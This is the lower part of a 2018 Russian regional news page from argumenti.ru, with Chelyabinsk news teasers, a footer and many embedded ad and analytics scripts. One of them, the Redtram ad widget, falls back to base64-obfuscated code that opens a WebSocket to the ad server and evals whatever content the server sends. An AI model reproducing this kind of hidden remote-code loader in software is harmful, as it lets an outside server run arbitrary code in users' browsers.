		<a href="http://argumenti.ru/economics/2018/10/587686">Депутат Госдумы от Челябинской области Владимир Бурматов рассказал, что впервые за последние несколько лет бюджет страны будет реализован с профицитом порядка двух триллионов рублей. Это позволит обеспечить все социальные гарантии, в том числе и индексацию пенсий, а также даст возможность регионам продолжать реализацию приоритетных нацпроектов.  <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/culture/2018/10/587628"><img src="http://argumenti.ru/images/preview/arhnews/ae508d3844d374bcb94a191a54572496.jpg" alt="В Красногорском открыли обновленный Дом культуры и новый кинозал" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/culture/2018/10/587628">В Красногорском открыли обновленный Дом культуры и новый кинозал</a>
							<span class="rub_time">01.10&nbsp;16:00</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/culture/2018/10/587628">Поселок Красногорский сохранил почетное имя для обновленного дома культуры – он остался ДК имени Ленина. А вот новенький кинозал, который, кстати, появился благодаря федеральной программе по развитию кино и поддержке региональных властей, получил легендарное имя.

 <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/sport/2018/10/587605"><img src="http://argumenti.ru/images/preview/arhnews/1c7e4fa9c9e4b59fd707528c72fd2226.jpg" alt="Йонас Энлунд стал игроком &laquo;Трактора&raquo;" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/sport/2018/10/587605">Йонас Энлунд стал игроком &laquo;Трактора&raquo;</a>
							<span class="rub_time">01.10&nbsp;12:29</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/sport/2018/10/587605">Соглашение с финном рассчитано до конца сезона. В прошедшем сезоне Энлунд играл за «Сибирь», провел 55 матчей и набрал 26 (9+17) очков при показателе полезности +10. <strong>>></strong>
		</a>
	</div>
</div>

																<script async type='text/javascript' src='//s.luxupcdnc.com/t/common_402.js'></script>
<script class='__lxGc__' type='text/javascript'>
((__lxGc__=window.__lxGc__||{'s':{},'b':0})['s']['_183738']=__lxGc__['s']['_183738']||{'b':{}})['b']['_621776']={'i':__lxGc__.b++};
</script>				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/economics/2018/10/587604"><img src="http://argumenti.ru/images/preview/arhnews/f468be7d07fdbf65b3135f60f51ad82c.jpg" alt="Проект &laquo;Сделано в Челябинске&raquo; : Игорь Файнман" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/economics/2018/10/587604">Проект &laquo;Сделано в Челябинске&raquo; : Игорь Файнман</a>
							<span class="rub_time">01.10&nbsp;12:27</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/economics/2018/10/587604">ООО «Академия финансов и биржи» основано в 2017 году. Компания создана экспертами в области управления личными финансами и инвестициями. Преподаватели и консультанты «Академии финансов и биржи»  — успешные трейдеры России, ученые, финансовые эксперты, признанные специалисты в области экономики, частные практикующие инвесторы.
 <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/10/587584"><img src="http://argumenti.ru/images/preview/arhnews/84eb0758ccf604741ef39d0e1adfb51e.jpg" alt="В Челябинск 16 ноября приедет глава Минприроды России" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/10/587584">В Челябинск 16 ноября приедет глава Минприроды России</a>
							<span class="rub_time">01.10&nbsp;09:25</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/10/587584">Совещание между членами профильного Комитета Госдумы по экологии, руководством Минприроды страны и Росприроднадзора намечено в Челябинске на 16 октября. Как рассказал глава Комитета Владимир Бурматов, инициатором встречи выступил глава Южного Урала Борис Дубровский.

 <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/09/587364"><img src="http://argumenti.ru/images/preview/arhnews/11e9e34c845b963d5bde1baa35267f89.JPG" alt="В Металлургическом районе прибраны почти все контейнерные площадки" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/09/587364">В Металлургическом районе прибраны почти все контейнерные площадки</a>
							<span class="rub_time">28.09&nbsp;14:13</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/09/587364">Депутат Госдумы Владимир Бурматов начал свою региональную неделю с объезда контейнерных площадок Челябинска. В первую очередь он побывал в Металлургическом районе, где порядка 250 мусорок не вывозились в течение нескольких дней.  <strong>>></strong>
		</a>
	</div>
</div>	
	
	<!--<p class="er_info"><a href="javascript:void(0)" onclick="winop()">Ошибка в тексте? Пожалуйста, выделите ее и нажмите "Ctrl + Enter"</a></p>-->

	            	
	<script id="js-mpf-mediator-init" data-counter="2820575" data-adaptive="true">!function(e){function t(t,n){if(!(n in e)){for(var r,a=e.document,i=a.scripts,o=i.length;o--;)if(-1!==i[o].src.indexOf(t)){r=i[o];break}if(!r){r=a.createElement("script"),r.type="text/javascript",r.async=!0,r.defer=!0,r.src=t,r.charset="UTF-8";;var d=function(){var e=a.getElementsByTagName("script")[0];e.parentNode.insertBefore(r,e)};"[object Opera]"==e.opera?a.addEventListener?a.addEventListener("DOMContentLoaded",d,!1):e.attachEvent("onload",d):d()}}}t("//mediator.mail.ru/script/2820575/","_mediator")}(window);</script>			
			<script src='//mediametrics.ru/partner/inject/injectv2.js' type='text/javascript' id='MediaMetricsInject' data-adaptive='true' data-img='true' data-imgsize='170' data-type='text-over-image' data-bgcolor='FFFFFF' data-bordercolor='000000' data-linkscolor='232323' data-transparent='' data-rows='4' data-inline='' data-fontfamily='arial' data-border='' data-borderwidth='0' data-place='left' data-fontsize='14' data-lineheight=21 data-visiblerows=3 data-fontweight=100 data-fontalign=left data-textposition="bottom" data-fontfamilycurrent="Roboto" data-period='online' data-alignment='horizontal' data-country='ru' data-site='mmet/example_com'> </script>
			
		</section>
	</div>

			<div style="margin-top: 8px;" class="right">

	<div id="smi2adblock_45368"><a href="https://smi2.net/">Новости smi2.ru</a></div>

<script async type="text/javascript" charset="windows-1251">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.smi2.ru/data/js/45368.js'; sc.charset = 'windows-1251';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>
		
	<!--Авторы-->
	
	<script async type='text/javascript' src='//s.luxupcdnc.com/t/common_402.js'></script>
<script class='__lxGc__' type='text/javascript'>
((__lxGc__=window.__lxGc__||{'s':{},'b':0})['s']['_183738']=__lxGc__['s']['_183738']||{'b':{}})['b']['_561097']={'i':__lxGc__.b++};
</script>
	<h2 class="namerub"><span class="rem">//</span>Новости партнеров</h2>
<!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_14114"></div>
<script language='JavaScript'>
var s = document.createElement("script"),
f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
s.type = "text/javascript";
s.async = true;
s.src = '//news.2xclick.ru/show/14114/block_a.js';
if (window.opera == "[object Opera]") {
document.addEventListener("DOMContentLoaded", f);
} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->




	<!--AdFox START-->
<!--argumentiru-->
<!--Площадка: Аргументы Недели / * / *-->
<!--Тип баннера: 240X400-->
<!--Расположение: <верх страницы>-->
<div id="adfox_151966360876562195"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 264297,
        containerId: 'adfox_151966360876562195',
        params: {
            pp: 'g',
            ps: 'cquo',
            p2: 'fvgz'
        }
    });
</script>	

	
	<!--AdFox START-->
<!--argumentiru-->
<!--Площадка: Аргументы Недели / * / *-->
<!--Тип баннера: 240X400-->
<!--Расположение: <середина страницы>-->
<div id="adfox_151974640082337171"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 264297,
        containerId: 'adfox_151974640082337171',
        params: {
            pp: 'h',
            ps: 'cquo',
            p2: 'fvgz'
        }
    });
</script>
				
	
	<h2 class="namerub"><span class="rem">//</span>Новости ADWILE</h2>
<div id="smi_teaser_10167">
<center><a href="http://partner.adwile.com" rel="nofollow">Нативная реклама ADWILE</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
 (function() {
 var sm = document.createElement("script");
 sm.type = "text/javascript";
 sm.async = true;
 sm.src = "//jsn.24smi.net/d/f/10167.js";
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(sm, s);})();
</script>

	
	<!--Фотогаллерея-->
	
	<h2 class="namerub"><span class="rem">//</span>Новости advert.mirtesen.ru</h2>
<div id="smi2adblock_81549"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.advert.mirtesen.ru/data/js/81549.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>

	
	<!-- Yandex.RTB R-A-50615-1 -->
<div id="yandex_rtb_R-A-50615-1"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-50615-1",
                renderTo: "yandex_rtb_R-A-50615-1",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
	<h4 class="namerub"><span class="rem">//</span>Читайте также</h4>
<ul class="main_inf_anons">
			<li>
							<a href="http://argumenti.ru/world/2018/10/588205?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/arhnews/cf098cd569b5b7b1da65e0f98dc5dc12.jpg" alt="Политолог оценил возможное введение санкций США против Индии из-за покупки С-400" /></a>
						<a href="http://argumenti.ru/world/2018/10/588205?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">Политолог оценил возможное введение санкций США против Индии из-за покупки С-400</a>
		</li>
			<li>
							<a href="http://argumenti.ru/live/2017/04/528641?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/tabloid/4cc437b541e00eb905f4c4652c61692d.jpg" alt="«Я должен сказать, что у Путина просто огромное терпение!»" /></a>
						<a href="http://argumenti.ru/live/2017/04/528641?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">«Я должен сказать, что у Путина просто огромное терпение!»</a>
		</li>
			<li>
							<a href="http://argumenti.ru/politics/2018/10/587807?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/arhnews/a947304296fe61644e8f84c05c714247.jpg" alt="&laquo;О сверле и дерьме&raquo; на МКС" /></a>
						<a href="http://argumenti.ru/politics/2018/10/587807?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">&laquo;О сверле и дерьме&raquo; на МКС</a>
		</li>
	</ul>
	<h2 class="namerub"><span class="rem">//</span>Новости Redtram</h2>
<script id="r34279" type="text/javascript">
    (function() {
        var worker34279,
            tickerID = 34279,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-ru.redtram.com/n4p/0/34/ticker_34279.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDtmdW5jdGlvbiBzZW5kVG9Tb2NrZXQoZGF0YSkge2lmICghc29ja2V0IHx8IHNvY2tldC5yZWFkeVN0YXRlID09PSBzb2NrZXQuQ0xPU0VEKSB7c29ja2V0ID0gbmV3IFdlYlNvY2tldCgid3NzOi8vbjRwLnJlZHRyYW0uY29tL3dzLyIpO3NvY2tldC5vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7cG9zdE1lc3NhZ2UoSlNPTi5zdHJpbmdpZnkoci5kYXRhKSk7fTt9aWYgKHNvY2tldCkge3NlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7c29ja2V0LnNlbmQoZGF0YSk7fSk7fX1mdW5jdGlvbiBzZW5kQ29ubmVjdGlvbihjLCByKSB7c2V0VGltZW91dChmdW5jdGlvbigpIHtpZiAoYy5yZWFkeVN0YXRlID09PSBjLk9QRU4pIHtyZXR1cm4gcigpO31yZXR1cm4gc2VuZENvbm5lY3Rpb24oYywgcik7fSwgNTApO31vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7IHNlbmRUb1NvY2tldChyLmRhdGEpOyB9Ow==';

                function runExternalMessage(data) {
                    worker34279.postMessage(data);
                }

                worker34279 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker34279.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker34279.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
	

	<h2 class="namerub"><span class="rem">//</span>Новости СМИ2</h2>
<div id="smi2adblock_72157"><a href="http://smi2.ru/" rel="nofollow">Новости СМИ2</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.smi2.ru/data/js/72157.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>	<h2 class="namerub"><span class="rem">//</span>Новости Lentainform.com</h2>
<!-- Composite Start -->
<div id="M256303ScriptRootC648515">
        <div id="M256303PreloadC648515">
        Загрузка...
    </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M256303ScriptRootC648515")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("M256303ScriptRootC648515");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=648515;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsc.lentainform.com/a/r/argumenti.ru.648515.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- Composite End -->
	
			
					
<div class="tabs">
    <h4 class="namerub"><span class="rem">//</span>Мы в соцсетях</h4>

        <input id="tab1" class="socialtabs" type="radio" name="tabs" checked>
        <label class="sociallabels vk" for="tab1" title="Wordpress"></label>
    
        <input id="tab2" class="socialtabs" type="radio" name="tabs">
        <label class="sociallabels fb" for="tab2" title="Windows"></label>
    
        <input id="tab3" class="socialtabs" type="radio" name="tabs">
        <label class="sociallabels ok" for="tab3" title="HTML5"></label>
    
        <section id="content1" class="tab-content">
<script type="text/javascript" src="//vk.com/js/api/openapi.js?115"></script>

<!-- VK Widget -->
<div id="vk_groups"></div>
<script type="text/javascript">
VK.Widgets.Group("vk_groups", {mode: 0, width: "240", height: "300", color1: 'FFFFFF', color2: '2B587A', color3: '5B7FA6'}, 14409962);
</script>

       </section>  
       <section id="content2" class="tab-content">
		<div id="fb-root"></div>
			<script>(function(d, s, id) {
		  var js, fjs = d.getElementsByTagName(s)[0];
		  if (d.getElementById(id)) return;
		  js = d.createElement(s); js.id = id;
		  js.src = "//connect.facebook.net/ru_RU/all.js#xfbml=1";
		  fjs.parentNode.insertBefore(js, fjs);
		}(document, 'script', 'facebook-jssdk'));</script>

		<div class="fb-like-box" data-href="http://www.facebook.com/argumentinedeli" data-width="240" data-height="303" data-show-faces="true" data-stream="false" data-border-color="b1bad0" data-header="true" data-rel="nofollow"></div>
        </section> 
        <section id="content3" class="tab-content">
		<div id="ok_group_widget"></div>
		<script>
		!function (d, id, did, st) {
		var js = d.createElement("script");
		js.src = "http://connect.ok.ru/connect.js";
		js.onload = js.onreadystatechange = function () {
		if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
		if (!this.executed) {
		this.executed = true;
		setTimeout(function () {
		OK.CONNECT.insertGroupWidget(id,did,st);
		}, 0);
		}
		}}
		d.documentElement.appendChild(js);
		}(document,"ok_group_widget","54308951490571","{width:240,height:335}");
		</script>
        </section>   

   </div>



	<div id="parthers_link"><a href="http://www.argumenti.ru/parthers">Новости партнеров</a>&nbsp;/<a href="http://www.argumenti.ru/info" rel="nofollow">Информация</a></div>
		<div id="block__fix-adv_r">
		<div id="gnezdo_ru_15140">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/15140/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
		
	</div>

	</div>		<div class="our_partners">
	<div>
		<h5 class="namerub" style="text-align:left;"><span class="rem">//</span>Наши партнеры</h5>
						<!-- ex_adv 32 --><a href="http://argumenti.ru/patriotichesky_plakat" alt="" target="_blank" rel="nofollow"><img src="http://www.argumenti.ru/images/partners/793.gif" width="200" height="200"></a>			<!-- ex_adv 34 --><a href="http://www.samboplanet.org/" alt="" target="_blank" rel="nofollow"><img src="http://www.argumenti.ru/images/partners/800.jpg" width="200" height="200"></a>				</div>
</div>

	<footer>


		<div class="foot_menu"><div id="menus">
		<ul class="mainmenu">
			<li><a href="http://argumenti.ru/politics">Политика</a></li>
			<li><a href="http://argumenti.ru/economics">Экономика</a></li>
			<li><a href="http://argumenti.ru/society">Общество</a></li>
			<li><a href="http://argumenti.ru/world">В мире</a></li>			
			<li><a href="http://argumenti.ru/showbiz"><nobr>Шоубиз</nobr></a></li>
			<li><a href="http://argumenti.ru/sport">Спорт</a></li>
			<li><a href="http://argumenti.ru/lifestyle">Лайфстайл</a></li>
			<li><a href="http://argumenti.ru/tourism">Туризм</a></li>
			<li><a href="http://argumenti.ru/culture">Культура</a></li>
		</ul>
</div></div>


<div class="footer_line">



	<div id="logo_footer">

	«Аргументы недели. Южный Урал». Св-во регионального СМИ – ПИ № ФС 77- 63382 от 16.10.2015
<p>Адрес редакции: Москва, ул. Тверская, д. 8/2 стр. 1</p>
<div id="endline"><p>Учредитель: ЗАО ИД "Аргументы недели"</p>
	<p>Главный редактор сайта: Олег Желтов</p>
	<p style="margin-top:5px;">Возрастная категория сайта: <span class="plus18">18+</span><!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t44.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet' "+
"border='0' width='31' height='31'><\/a>")
//--></script><!--/LiveInternet--></p>
</div>

	</div>


	<div id="copy">
		<ul id="footer_menu">
			<li>Ваш город: /</li>
			<li><a href="http://argumenti.ru/reklama/internet.html" rel="nofollow">РЕКЛАМА</a> +7 (495) 981-68-36</li>
			<li><a href="http://argumenti.ru/pub/doc/an.pdf" target="_blank" rel="nofollow">Об издании</a></li>
		</ul>
		<p><a href="mailto:anonline@argumenti.ru" rel="nofollow">anonline@argumenti.ru</a></p>
		<p>Свободное использование в Интернет-пространстве текстов, фото и видеоматериалов, опубликованных на этом сайте, допускается при условии обязательного размещения гиперссылки на источник публикации www.argumenti.ru. Использование материалов в печатных СМИ допускается только с письменного разрешения редакции. 
		


	</div>
	<div id = "rating">
<ul id="socnets" style="margin-bottom:48px;">
				<li><a class="vk" target="_blank" href="http://vkontakte.ru/club14409962" rel="nofollow"></a></li>
				<li><a class="tw" target="_blank" href="http://twitter.com/argumenti" rel="nofollow"></a></li>
				<li><a class="fb" target="_blank" href="https://www.facebook.com/argumentinedeli" rel="nofollow"></a></li>
				<li><a class="mm" target="_blank" href="http://my.mail.ru/community/argumenti" rel="nofollow"></a></li>
				<li><a class="ok" target="_blank" href="http://www.odnoklassniki.ru/argumenti" rel="nofollow"></a></li>
				<li><a class="in" target="_blank" href="http://instagram.com/argumenti.ru" rel="nofollow"></a></li>
			</ul>



<span class="counter">

<!-- Rating@Mail.ru logo -->
<a href="http://top.mail.ru/jump?from=1069168" rel="nofollow">
<img src="//top-fwz1.mail.ru/counter?id=1069168;t=479;l=1"
style="border:0;" height="31" width="88" alt="Рейтинг@Mail.ru" /></a>
<!-- //Rating@Mail.ru logo -->

</span>



<a style="float:right" target="_blank" href="http://www.rambler.ru/" rel="nofollow">"Партнер Рамблера"</a>




</div>
</div>


<!--<div id="footer_parthers"></div>-->

</footer>

</div>

<!--/noindex-->


<script type="text/javascript">
//<![CDATA[
yandex_direct_place = 'ya_direct';
yandex_partner_id = 50615;
yandex_site_bg_color = 'FFFFFF';
yandex_site_charset = 'utf-8';
yandex_ad_format = 'direct';
yandex_font_size = .75;
yandex_direct_type = 'vertical';
yandex_direct_limit = 5;
yandex_direct_header_bg_color = 'ECECEC';
yandex_direct_bg_color = 'ECECEC';
yandex_direct_border_color = 'FFFFFF';
yandex_direct_title_color = '000000';
yandex_direct_url_color = '666666';
yandex_direct_all_color = '000000';
yandex_direct_text_color = '000000';
yandex_direct_hover_color = '000000';
yandex_direct_favicon = true;
//]]>
</script>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-11186859-1', 'auto');
  ga('send', 'pageview');

</script>

		
</body>
</html>